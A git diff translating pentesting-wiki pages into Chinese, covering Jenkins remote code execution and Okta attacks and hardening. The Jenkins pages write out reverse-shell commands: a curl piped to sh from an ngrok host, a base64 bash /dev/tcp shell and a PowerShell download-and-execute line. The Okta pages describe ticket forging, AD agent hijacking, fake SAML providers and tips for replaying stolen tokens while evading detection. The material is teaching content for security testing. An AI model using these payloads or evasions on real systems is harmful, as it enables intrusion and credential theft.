b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md index 89ca15223..48a4f9952 100644 --- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md +++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md @@ -1,43 +1,37 @@ -# Jenkins RCE Creating/Modifying Pipeline +# Jenkins RCE 创建/修改管道 {{#include ../../banners/hacktricks-training.md}} -## Creating a new Pipeline +## 创建新管道 -In "New Item" (accessible in `/view/all/newJob`) select **Pipeline:** +在“新项目”(可在 `/view/all/newJob` 访问)中选择 **Pipeline:** ![](<../../images/image (235).png>) -In the **Pipeline section** write the **reverse shell**: +在 **Pipeline 部分** 中写入 **reverse shell**: ![](<../../images/image (285).png>) - ```groovy pipeline { - agent any +agent any - stages { - stage('Hello') { - steps { - sh ''' - curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh - ''' - } - } - } +stages { +stage('Hello') { +steps { +sh ''' +curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh +''' +} +} +} } ``` - -Finally click on **Save**, and **Build Now** and the pipeline will be executed: +最后点击 **Save**,然后 **Build Now**,管道将被执行: ![](<../../images/image (228).png>) -## Modifying a Pipeline +## 修改管道 -If you can access the configuration file of some pipeline configured you could just **modify it appending your reverse shell** and then execute it or wait until it gets executed. +如果您可以访问某个已配置管道的配置文件,您可以直接 **修改它,附加您的反向 shell**,然后执行它或等待它被执行。 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md index f16096070..f1a0ee3cd 100644 --- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md +++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md @@ -1,40 +1,36 @@ -# Jenkins RCE Creating/Modifying Project +# Jenkins RCE 创建/修改项目 {{#include ../../banners/hacktricks-training.md}} -## Creating a Project +## 创建项目 -This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project). +此方法非常嘈杂,因为您必须创建一个全新的项目(显然,这仅在您允许用户创建新项目时有效)。 -1. **Create a new project** (Freestyle project) clicking "New Item" or in `/view/all/newJob` -2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._ -3. Click **Build now** - 1. If **Build now** button doesn't appear, you can still go to **configure** --> **Build Triggers** --> `Build periodically` and set a cron of `* * * * *` - 2. Instead of using cron, you can use the config "**Trigger builds remotely**" where you just need to set a the api token name to trigger the job. Then go to your user profile and **generate an API token** (call this API token as you called the api token to trigger the job). Finally, trigger the job with: **`curl :@/job//build?token=`** +1. **创建一个新项目**(自由风格项目),点击“新建项目”或在 `/view/all/newJob` +2. 在 **构建** 部分设置 **执行 shell**,并粘贴一个 powershell Empire 启动器或一个 meterpreter powershell(可以使用 _unicorn_ 获得)。使用 _PowerShell.exe_ 启动有效载荷,而不是使用 _powershell._ +3. 点击 **立即构建** +1. 如果 **立即构建** 按钮没有出现,您仍然可以转到 **配置** --> **构建触发器** --> `定期构建` 并设置一个 cron 为 `* * * * *` +2. 除了使用 cron,您还可以使用配置“**远程触发构建**”,您只需设置一个 api 令牌名称来触发作业。然后转到您的用户配置文件并 **生成一个 API 令牌**(将此 API 令牌称为您用于触发作业的 api 令牌)。最后,使用以下命令触发作业:**`curl :@/job//build?token=`** ![](<../../images/image (165).png>) -## Modifying a Project +## 修改项目 -Go to the projects and check **if you can configure any** of them (look for the "Configure button"): +转到项目并检查 **您是否可以配置任何** 项目(查找“配置按钮”): ![](<../../images/image (265).png>) -If you **cannot** see any **configuration** **button** then you **cannot** **configure** it probably (but check all projects as you might be able to configure some of them and not others). +如果您 **看不到任何** **配置** **按钮**,那么您 **可能无法** **配置** 它(但检查所有项目,因为您可能能够配置其中一些而不是其他项目)。 -Or **try to access to the path** `/job//configure` or `/me/my-views/view/all/job//configure` \_\_ in each project (example: `/job/Project0/configure` or `/me/my-views/view/all/job/Project0/configure`). +或者 **尝试访问路径** `/job//configure` 或 `/me/my-views/view/all/job//configure` \_\_ 在每个项目中(示例:`/job/Project0/configure` 或 `/me/my-views/view/all/job/Project0/configure`)。 -## Execution +## 执行 -If you are allowed to configure the project you can **make it execute commands when a build is successful**: +如果您被允许配置项目,您可以 **使其在构建成功时执行命令**: ![](<../../images/image (98).png>) -Click on **Save** and **build** the project and your **command will be executed**.\ -If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**. +点击 **保存** 并 **构建** 项目,您的 **命令将被执行**。\ +如果您不是在执行反向 shell 而是一个简单命令,您可以 **在构建的输出中查看命令的输出**。 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md index 33821cc03..36e859144 100644 --- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md +++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md @@ -4,24 +4,21 @@ ## Jenkins RCE with Groovy Script -This is less noisy than creating a new project in Jenkins - -1. Go to _path_jenkins/script_ -2. Inside the text box introduce the script +这比在Jenkins中创建新项目要安静得多 +1. 转到 _path_jenkins/script_ +2. 在文本框中输入脚本 ```python def process = "PowerShell.exe ".execute() println "Found text ${process.text}" ``` +您可以使用以下命令执行: `cmd.exe /c dir` -You could execute a command using: `cmd.exe /c dir` +在 **linux** 中,您可以这样做: **`"ls /".execute().text`** -In **linux** you can do: **`"ls /".execute().text`** - -If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload. - -**Another useful groovy script** is (replace \[INSERT COMMAND]): +如果您需要在文本中使用 _引号_ 和 _单引号_,可以使用 _"""PAYLOAD"""_(三重双引号)来执行有效载荷。 +**另一个有用的 groovy 脚本** 是(替换 \[INSERT COMMAND]): ```python def sout = new StringBuffer(), serr = new StringBuffer() def proc = '[INSERT COMMAND]'.execute() @@ -29,9 +26,7 @@ proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr" ``` - -### Reverse shell in linux - +### Linux中的反向Shell ```python def sout = new StringBuffer(), serr = new StringBuffer() def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute() @@ -39,29 +34,20 @@ proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr" ``` +### Windows中的反向Shell -### Reverse shell in windows - -You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it: - +您可以准备一个带有PS反向Shell的HTTP服务器,并使用Jeking下载并执行它: ```python scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')" echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0 cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc ``` - ### Script -You can automate this process with [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py). - -You can use MSF to get a reverse shell: +您可以使用[**此脚本**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py)自动化此过程。 +您可以使用 MSF 获取反向 shell: ``` msf> use exploit/multi/http/jenkins_script_console ``` - {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/okta-security/README.md b/src/pentesting-ci-cd/okta-security/README.md index e682996c2..e871e53b3 100644 --- a/src/pentesting-ci-cd/okta-security/README.md +++ b/src/pentesting-ci-cd/okta-security/README.md @@ -2,117 +2,113 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -[Okta, Inc.](https://www.okta.com/) is recognized in the identity and access management sector for its cloud-based software solutions. These solutions are designed to streamline and secure user authentication across various modern applications. They cater not only to companies aiming to safeguard their sensitive data but also to developers interested in integrating identity controls into applications, web services, and devices. +[Okta, Inc.](https://www.okta.com/) 在身份和访问管理领域因其基于云的软件解决方案而受到认可。这些解决方案旨在简化和保护各种现代应用程序的用户身份验证。它们不仅服务于希望保护敏感数据的公司,还服务于希望将身份控制集成到应用程序、网络服务和设备中的开发人员。 -The flagship offering from Okta is the **Okta Identity Cloud**. This platform encompasses a suite of products, including but not limited to: +Okta 的旗舰产品是 **Okta Identity Cloud**。该平台包含一系列产品,包括但不限于: -- **Single Sign-On (SSO)**: Simplifies user access by allowing one set of login credentials across multiple applications. -- **Multi-Factor Authentication (MFA)**: Enhances security by requiring multiple forms of verification. -- **Lifecycle Management**: Automates user account creation, update, and deactivation processes. -- **Universal Directory**: Enables centralized management of users, groups, and devices. -- **API Access Management**: Secures and manages access to APIs. +- **单点登录 (SSO)**:通过允许在多个应用程序中使用一组登录凭据来简化用户访问。 +- **多因素身份验证 (MFA)**:通过要求多种验证形式来增强安全性。 +- **生命周期管理**:自动化用户帐户的创建、更新和停用过程。 +- **通用目录**:实现用户、组和设备的集中管理。 +- **API 访问管理**:保护和管理对 API 的访问。 -These services collectively aim to fortify data protection and streamline user access, enhancing both security and convenience. The versatility of Okta's solutions makes them a popular choice across various industries, beneficial to large enterprises, small companies, and individual developers alike. As of the last update in September 2021, Okta is acknowledged as a prominent entity in the Identity and Access Management (IAM) arena. +这些服务共同旨在加强数据保护并简化用户访问,提高安全性和便利性。Okta 解决方案的多样性使其成为各个行业的热门选择,适合大型企业、小公司和个人开发者。截至 2021 年 9 月的最后更新,Okta 被认为是身份和访问管理 (IAM) 领域的一个重要实体。 > [!CAUTION] -> The main gola of Okta is to configure access to different users and groups to external applications. If you manage to **compromise administrator privileges in an Oktas** environment, you will highly probably able to **compromise all the other platforms the company is using**. +> Okta 的主要目标是为不同用户和组配置对外部应用程序的访问。如果您设法在 Okta 环境中 **破坏管理员权限**,您很可能能够 **破坏公司使用的所有其他平台**。 > [!TIP] -> To perform a security review of an Okta environment you should ask for **administrator read-only access**. +> 要对 Okta 环境进行安全审查,您应该请求 **管理员只读访问**。 -### Summary +### 摘要 -There are **users** (which can be **stored in Okta,** logged from configured **Identity Providers** or authenticated via **Active Directory** or LDAP).\ -These users can be inside **groups**.\ -There are also **authenticators**: different options to authenticate like password, and several 2FA like WebAuthn, email, phone, okta verify (they could be enabled or disabled)... +有 **用户**(可以是 **存储在 Okta 中,** 从配置的 **身份提供者** 登录或通过 **Active Directory** 或 LDAP 进行身份验证)。\ +这些用户可以在 **组** 内。\ +还有 **身份验证器**:不同的身份验证选项,如密码和多种 2FA,如 WebAuthn、电子邮件、电话、Okta Verify(它们可以启用或禁用)... -Then, there are **applications** synchronized with Okta. Each applications will have some **mapping with Okta** to share information (such as email addresses, first names...). Moreover, each application must be inside an **Authentication Policy**, which indicates the **needed authenticators** for a user to **access** the application. +然后,有与 Okta 同步的 **应用程序**。每个应用程序将与 Okta 有一些 **映射** 以共享信息(如电子邮件地址、名字等)。此外,每个应用程序必须在 **身份验证策略** 中,指明用户 **访问** 应用程序所需的 **身份验证器**。 > [!CAUTION] -> The most powerful role is **Super Administrator**. +> 最强大的角色是 **超级管理员**。 > -> If an attacker compromise Okta with Administrator access, all the **apps trusting Okta** will be highly probably **compromised**. +> 如果攻击者以管理员身份破坏 Okta,所有 **信任 Okta 的应用程序** 很可能会 **被破坏**。 -## Attacks +## 攻击 -### Locating Okta Portal +### 定位 Okta 门户 -Usually the portal of a company will be located in **companyname.okta.com**. If not, try simple **variations** of **companyname.** If you cannot find it, it's also possible that the organization has a **CNAME** record like **`okta.companyname.com`** pointing to the **Okta portal**. +通常公司的门户将位于 **companyname.okta.com**。如果没有,请尝试简单的 **companyname.** 的 **变体**。如果找不到,也可能该组织有一个指向 **Okta 门户** 的 **CNAME** 记录,如 **`okta.companyname.com`**。 -### Login in Okta via Kerberos +### 通过 Kerberos 登录 Okta -If **`companyname.kerberos.okta.com`** is active, **Kerberos is used for Okta access**, typically bypassing **MFA** for **Windows** users. To find Kerberos-authenticated Okta users in AD, run **`getST.py`** with **appropriate parameters**. Upon obtaining an **AD user ticket**, **inject** it into a controlled host using tools like Rubeus or Mimikatz, ensuring **`clientname.kerberos.okta.com` is in the Internet Options "Intranet" zone**. Accessing a specific URL should return a JSON "OK" response, indicating Kerberos ticket acceptance, and granting access to the Okta dashboard. +如果 **`companyname.kerberos.okta.com`** 活跃,**Kerberos 用于 Okta 访问**,通常会绕过 **MFA** 以供 **Windows** 用户使用。要在 AD 中查找 Kerberos 认证的 Okta 用户,请使用 **适当的参数** 运行 **`getST.py`**。在获得 **AD 用户票证** 后,使用 Rubeus 或 Mimikatz 等工具将其 **注入** 到受控主机中,确保 **`clientname.kerberos.okta.com` 在 Internet 选项的 "内部网" 区域**。访问特定 URL 应返回 JSON "OK" 响应,表示 Kerberos 票证被接受,并授予访问 Okta 仪表板的权限。 -Compromising the **Okta service account with the delegation SPN enables a Silver Ticket attack.** However, Okta's use of **AES** for ticket encryption requires possessing the AES key or plaintext password. Use **`ticketer.py` to generate a ticket for the victim user** and deliver it via the browser to authenticate with Okta. +破坏 **Okta 服务帐户与委派 SPN 使得银票攻击成为可能**。然而,Okta 使用 **AES** 进行票证加密,需要拥有 AES 密钥或明文密码。使用 **`ticketer.py` 为受害者用户生成票证**,并通过浏览器传递以进行 Okta 身份验证。 -**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.** +**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**。** -### Hijacking Okta AD Agent +### 劫持 Okta AD 代理 -This technique involves **accessing the Okta AD Agent on a server**, which **syncs users and handles authentication**. By examining and decrypting configurations in **`OktaAgentService.exe.config`**, notably the AgentToken using **DPAPI**, an attacker can potentially **intercept and manipulate authentication data**. This allows not only **monitoring** and **capturing user credentials** in plaintext during the Okta authentication process but also **responding to authentication attempts**, thereby enabling unauthorized access or providing universal authentication through Okta (akin to a 'skeleton key'). +该技术涉及 **访问服务器上的 Okta AD 代理**,该代理 **同步用户并处理身份验证**。通过检查和解密 **`OktaAgentService.exe.config`** 中的配置,特别是使用 **DPAPI** 的 AgentToken,攻击者可以潜在地 **拦截和操纵身份验证数据**。这不仅允许 **监控** 和 **捕获用户凭据** 在 Okta 身份验证过程中的明文,还可以 **响应身份验证尝试**,从而实现未经授权的访问或通过 Okta 提供通用身份验证(类似于“万能钥匙”)。 -**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.** +**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**。** -### Hijacking AD As an Admin +### 作为管理员劫持 AD -This technique involves hijacking an Okta AD Agent by first obtaining an OAuth Code, then requesting an API token. The token is associated with an AD domain, and a **connector is named to establish a fake AD agent**. Initialization allows the agent to **process authentication attempts**, capturing credentials via the Okta API. Automation tools are available to streamline this process, offering a seamless method to intercept and handle authentication data within the Okta environment. +该技术涉及通过首先获取 OAuth 代码来劫持 Okta AD 代理,然后请求 API 令牌。该令牌与 AD 域相关联,并且 **连接器被命名以建立一个假 AD 代理**。初始化允许代理 **处理身份验证尝试**,通过 Okta API 捕获凭据。可用的自动化工具可以简化此过程,提供在 Okta 环境中拦截和处理身份验证数据的无缝方法。 -**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.** +**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**。** -### Okta Fake SAML Provider +### Okta 假 SAML 提供者 -**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.** +**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**。** -The technique involves **deploying a fake SAML provider**. By integrating an external Identity Provider (IdP) within Okta's framework using a privileged account, attackers can **control the IdP, approving any authentication request at will**. The process entails setting up a SAML 2.0 IdP in Okta, manipulating the IdP Single Sign-On URL for redirection via local hosts file, generating a self-signed certificate, and configuring Okta settings to match against the username or email. Successfully executing these steps allows for authentication as any Okta user, bypassing the need for individual user credentials, significantly elevating access control in a potentially unnoticed manner. +该技术涉及 **部署一个假 SAML 提供者**。通过使用特权帐户在 Okta 框架中集成外部身份提供者 (IdP),攻击者可以 **控制 IdP,随意批准任何身份验证请求**。该过程包括在 Okta 中设置 SAML 2.0 IdP,操纵 IdP 单点登录 URL 通过本地 hosts 文件进行重定向,生成自签名证书,并配置 Okta 设置以匹配用户名或电子邮件。成功执行这些步骤允许以任何 Okta 用户的身份进行身份验证,绕过对单个用户凭据的需求,显著提高访问控制,可能不会被注意。 -### Phishing Okta Portal with Evilgnix +### 使用 Evilgnix 针对 Okta 门户的钓鱼 -In [**this blog post**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) is explained how to prepare a phishing campaign against an Okta portal. +在 [**这篇博客文章**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) 中解释了如何准备针对 Okta 门户的钓鱼活动。 -### Colleague Impersonation Attack +### 同事冒充攻击 -The **attributes that each user can have and modify** (like email or first name) can be configured in Okta. If an **application** is **trusting** as ID an **attribute** that the user can **modify**, he will be able to **impersonate other users in that platform**. +每个用户可以拥有和修改的 **属性**(如电子邮件或名字)可以在 Okta 中配置。如果一个 **应用程序** 将用户可以 **修改** 的 **属性** 作为 ID 进行 **信任**,他将能够 **在该平台上冒充其他用户**。 -Therefore, if the app is trusting the field **`userName`**, you probably won't be able to change it (because you usually cannot change that field), but if it's trusting for example **`primaryEmail`** you might be able to **change it to a colleagues email address** and impersonate it (you will need to have access to the email and accept the change). +因此,如果该应用程序信任字段 **`userName`**,您可能无法更改它(因为通常无法更改该字段),但如果它信任例如 **`primaryEmail`**,您可能能够 **将其更改为同事的电子邮件地址** 并冒充它(您需要访问该电子邮件并接受更改)。 -Note that this impersoantion depends on how each application was condigured. Only the ones trusting the field you modified and accepting updates will be compromised.\ -Therefore, the app should have this field enabled if it exists: +请注意,这种冒充取决于每个应用程序的配置。只有信任您修改的字段并接受更新的应用程序将受到影响。\ +因此,如果存在,该应用程序应启用此字段:
-I have also seen other apps that were vulnerable but didn't have that field in the Okta settings (at the end different apps are configured differently). +我还见过其他易受攻击的应用程序,但在 Okta 设置中没有该字段(最终不同的应用程序配置不同)。 -The best way to find out if you could impersonate anyone on each app would be to try it! +找出您是否可以在每个应用程序上冒充任何人的最佳方法是尝试一下! -## Evading behavioural detection policies +## 规避行为检测策略 -Behavioral detection policies in Okta might be unknown until encountered, but **bypassing** them can be achieved by **targeting Okta applications directly**, avoiding the main Okta dashboard. With an **Okta access token**, replay the token at the **application-specific Okta URL** instead of the main login page. +Okta 中的行为检测策略可能在遇到之前未知,但 **绕过** 它们可以通过 **直接针对 Okta 应用程序** 来实现,避免主要的 Okta 仪表板。使用 **Okta 访问令牌**,在 **特定应用程序的 Okta URL** 上重放令牌,而不是主登录页面。 -Key recommendations include: +关键建议包括: -- **Avoid using** popular anonymizer proxies and VPN services when replaying captured access tokens. -- Ensure **consistent user-agent strings** between the client and replayed access tokens. -- **Refrain from replaying** tokens from different users from the same IP address. -- Exercise caution when replaying tokens against the Okta dashboard. -- If aware of the victim company's IP addresses, **restrict traffic** to those IPs or their range, blocking all other traffic. +- **避免使用** 流行的匿名代理和 VPN 服务来重放捕获的访问令牌。 +- 确保 **客户端和重放访问令牌之间的一致用户代理字符串**。 +- **避免从同一 IP 地址重放** 来自不同用户的令牌。 +- 在重放令牌时对 Okta 仪表板要小心。 +- 如果知道受害公司 IP 地址,**限制流量** 到这些 IP 或其范围,阻止所有其他流量。 -## Okta Hardening +## Okta 加固 -Okta has a lot of possible configurations, in this page you will find how to review them so they are as secure as possible: +Okta 有很多可能的配置,在此页面中您将找到如何审查它们以确保尽可能安全: {{#ref}} okta-hardening.md {{#endref}} -## References +## 参考 - [https://trustedsec.com/blog/okta-for-red-teamers](https://trustedsec.com/blog/okta-for-red-teamers) - [https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/okta-security/okta-hardening.md b/src/pentesting-ci-cd/okta-security/okta-hardening.md index a7dac96a7..3bf460d60 100644 --- a/src/pentesting-ci-cd/okta-security/okta-hardening.md +++ b/src/pentesting-ci-cd/okta-security/okta-hardening.md @@ -2,202 +2,198 @@ {{#include ../../banners/hacktricks-training.md}} -## Directory +## 目录 -### People +### 人员 -From an attackers perspective, this is super interesting as you will be able to see **all the users registered**, their **email** addresses, the **groups** they are part of, **profiles** and even **devices** (mobiles along with their OSs). +从攻击者的角度来看,这非常有趣,因为您将能够看到**所有注册的用户**、他们的**电子邮件**地址、他们所属的**组**、**个人资料**,甚至**设备**(手机及其操作系统)。 -For a whitebox review check that there aren't several "**Pending user action**" and "**Password reset**". +对于白盒审查,请检查是否没有多个“**待处理用户操作**”和“**密码重置**”。 -### Groups +### 组 -This is where you find all the created groups in Okta. it's interesting to understand the different groups (set of **permissions**) that could be granted to **users**.\ -It's possible to see the **people included inside groups** and **apps assigned** to each group. +这是您可以找到在 Okta 中创建的所有组的地方。了解不同的组(**权限**集合)可能授予**用户**的权限是很有趣的。\ +可以查看**包含在组中的人员**和**分配给每个组的应用程序**。 -Ofc, any group with the name of **admin** is interesting, specially the group **Global Administrators,** check the members to learn who are the most privileged members. +当然,任何名为**admin**的组都很有趣,特别是**全球管理员**组,检查成员以了解谁是特权成员。 -From a whitebox review, there **shouldn't be more than 5 global admins** (better if there are only 2 or 3). +从白盒审查来看,**全球管理员不应超过 5 个**(最好只有 2 或 3 个)。 -### Devices +### 设备 -Find here a **list of all the devices** of all the users. You can also see if it's being **actively managed** or not. +在这里找到**所有用户的设备列表**。您还可以查看它是否被**主动管理**。 -### Profile Editor +### 个人资料编辑器 -Here is possible to observe how key information such as first names, last names, emails, usernames... are shared between Okta and other applications. This is interesting because if a user can **modify in Okta a field** (such as his name or email) that then is used by an **external application** to **identify** the user, an insider could try to **take over other accounts**. +在这里可以观察到关键的个人信息,如名字、姓氏、电子邮件、用户名等是如何在 Okta 和其他应用程序之间共享的。这很有趣,因为如果用户可以在 Okta 中**修改某个字段**(例如他的名字或电子邮件),而该字段又被**外部应用程序**用来**识别**用户,那么内部人员可能会尝试**接管其他账户**。 -Moreover, in the profile **`User (default)`** from Okta you can see **which fields** each **user** has and which ones are **writable** by users. If you cannot see the admin panel, just go to **update your profile** information and you will see which fields you can update (note that to update an email address you will need to verify it). +此外,在 Okta 的个人资料**`用户(默认)`**中,您可以看到**每个用户**具有的**字段**以及哪些字段是**可写**的。如果您无法看到管理面板,只需转到**更新您的个人资料**信息,您将看到可以更新的字段(请注意,要更新电子邮件地址,您需要验证它)。 -### Directory Integrations +### 目录集成 -Directories allow you to import people from existing sources. I guess here you will see the users imported from other directories. +目录允许您从现有来源导入人员。我想在这里您将看到从其他目录导入的用户。 -I haven't seen it, but I guess this is interesting to find out **other directories that Okta is using to import users** so if you **compromise that directory** you could set some attributes values in the users created in Okta and **maybe compromise the Okta env**. +我没有看到它,但我想这很有趣,可以找出**Okta 用于导入用户的其他目录**,因此如果您**妥协该目录**,您可以在 Okta 中创建的用户中设置一些属性值,并**可能妥协 Okta 环境**。 -### Profile Sources +### 个人资料来源 -A profile source is an **application that acts as a source of truth** for user profile attributes. A user can only be sourced by a single application or directory at a time. +个人资料来源是**作为用户个人资料属性的真实来源的应用程序**。用户一次只能由一个应用程序或目录提供。 -I haven't seen it, so any information about security and hacking regarding this option is appreciated. +我没有看到它,因此关于此选项的安全性和黑客攻击的任何信息都很受欢迎。 -## Customizations +## 自定义 -### Brands +### 品牌 -Check in the **Domains** tab of this section the email addresses used to send emails and the custom domain inside Okta of the company (which you probably already know). +在此部分的**域**选项卡中检查用于发送电子邮件的电子邮件地址和公司在 Okta 中的自定义域(您可能已经知道)。 -Moreover, in the **Setting** tab, if you are admin, you can "**Use a custom sign-out page**" and set a custom URL. +此外,在**设置**选项卡中,如果您是管理员,您可以“**使用自定义注销页面**”并设置自定义 URL。 -### SMS +### 短信 -Nothing interesting here. +这里没有什么有趣的内容。 -### End-User Dashboard +### 最终用户仪表板 -You can find here applications configured, but we will see the details of those later in a different section. +您可以在这里找到配置的应用程序,但我们将在不同的部分稍后查看这些详细信息。 -### Other +### 其他 -Interesting setting, but nothing super interesting from a security point of view. +有趣的设置,但从安全的角度来看没有什么特别有趣的内容。 -## Applications +## 应用程序 -### Applications +### 应用程序 -Here you can find all the **configured applications** and their details: Who has access to them, how is it configured (SAML, OPenID), URL to login, the mappings between Okta and the application... +在这里,您可以找到所有**配置的应用程序**及其详细信息:谁可以访问它们,如何配置(SAML、OpenID)、登录 URL、Okta 和应用程序之间的映射... -In the **`Sign On`** tab there is also a field called **`Password reveal`** that would allow a user to **reveal his password** when checking the application settings. To check the settings of an application from the User Panel, click the 3 dots: +在**`登录`**选项卡中,还有一个名为**`密码显示`**的字段,允许用户在检查应用程序设置时**显示他的密码**。要从用户面板检查应用程序的设置,请单击 3 个点:
-And you could see some more details about the app (like the password reveal feature, if it's enabled): +您可以看到有关该应用程序的更多详细信息(例如密码显示功能是否启用):
-## Identity Governance +## 身份治理 -### Access Certifications +### 访问认证 -Use Access Certifications to create audit campaigns to review your users' access to resources periodically and approve or revoke access automatically when required. +使用访问认证创建审计活动,以定期审查用户对资源的访问,并在需要时自动批准或撤销访问。 -I haven't seen it used, but I guess that from a defensive point of view it's a nice feature. +我没有看到它被使用,但我想从防御的角度来看,这是一个不错的功能。 -## Security +## 安全 -### General +### 一般 -- **Security notification emails**: All should be enabled. -- **CAPTCHA integration**: It's recommended to set at least the invisible reCaptcha -- **Organization Security**: Everything can be enabled and activation emails shouldn't last long (7 days is ok) -- **User enumeration prevention**: Both should be enabled - - Note that User Enumeration Prevention doesn't take effect if either of the following conditions are allowed (See [User management](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) for more information): - - Self-Service Registration - - JIT flows with email authentication -- **Okta ThreatInsight settings**: Log and enforce security based on threat level +- **安全通知电子邮件**:所有应启用。 +- **CAPTCHA 集成**:建议至少设置不可见的 reCaptcha。 +- **组织安全**:所有内容都可以启用,激活电子邮件不应持续太长时间(7 天是可以的)。 +- **用户枚举防止**:两者都应启用。 +- 请注意,如果允许以下任一条件,则用户枚举防止将无效(有关更多信息,请参见 [用户管理](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm)): +- 自助注册 +- 带电子邮件身份验证的 JIT 流程 +- **Okta ThreatInsight 设置**:根据威胁级别记录和执行安全性。 ### HealthInsight -Here is possible to find correctly and **dangerous** configured **settings**. +在这里可以找到正确和**危险**配置的**设置**。 -### Authenticators +### 认证器 -Here you can find all the authentication methods that a user could use: Password, phone, email, code, WebAuthn... Clicking in the Password authenticator you can see the **password policy**. Check that it's strong. +在这里,您可以找到用户可以使用的所有身份验证方法:密码、电话、电子邮件、代码、WebAuthn... 单击密码认证器,您可以查看**密码策略**。请检查它是否强大。 -In the **Enrollment** tab you can see how the ones that are required or optinal: +在**注册**选项卡中,您可以看到哪些是必需的或可选的:
-It's recommendatble to disable Phone. The strongest ones are probably a combination of password, email and WebAuthn. +建议禁用电话。最强的组合可能是密码、电子邮件和 WebAuthn 的组合。 -### Authentication policies +### 身份验证策略 -Every app has an authentication policy. The authentication policy verifies that users who try to sign in to the app meet specific conditions, and it enforces factor requirements based on those conditions. +每个应用程序都有一个身份验证策略。身份验证策略验证尝试登录应用程序的用户是否满足特定条件,并根据这些条件强制执行因素要求。 -Here you can find the **requirements to access each application**. It's recommended to request at least password and another method for each application. But if as attacker you find something more weak you might be able to attack it. +在这里,您可以找到**访问每个应用程序的要求**。建议每个应用程序至少请求密码和另一种方法。但是,如果作为攻击者您发现某些东西更弱,您可能能够攻击它。 -### Global Session Policy +### 全局会话策略 -Here you can find the session policies assigned to different groups. For example: +在这里,您可以找到分配给不同组的会话策略。例如:
-It's recommended to request MFA, limit the session lifetime to some hours, don't persis session cookies across browser extensions and limit the location and Identity Provider (if this is possible). For example, if every user should be login from a country you could only allow this location. +建议请求 MFA,将会话生命周期限制为几个小时,不要在浏览器扩展中持久化会话 cookie,并限制位置和身份提供者(如果可能的话)。例如,如果每个用户应该从一个国家登录,您可以只允许该位置。 -### Identity Providers +### 身份提供者 -Identity Providers (IdPs) are services that **manage user accounts**. Adding IdPs in Okta enables your end users to **self-register** with your custom applications by first authenticating with a social account or a smart card. +身份提供者(IdP)是**管理用户账户**的服务。在 Okta 中添加 IdP 使您的最终用户能够通过首先使用社交账户或智能卡进行身份验证来**自助注册**您的自定义应用程序。 -On the Identity Providers page, you can add social logins (IdPs) and configure Okta as a service provider (SP) by adding inbound SAML. After you've added IdPs, you can set up routing rules to direct users to an IdP based on context, such as the user's location, device, or email domain. +在身份提供者页面上,您可以添加社交登录(IdP)并通过添加入站 SAML 将 Okta 配置为服务提供者(SP)。添加 IdP 后,您可以设置路由规则,根据上下文(例如用户的位置、设备或电子邮件域)将用户定向到 IdP。 -**If any identity provider is configured** from an attackers 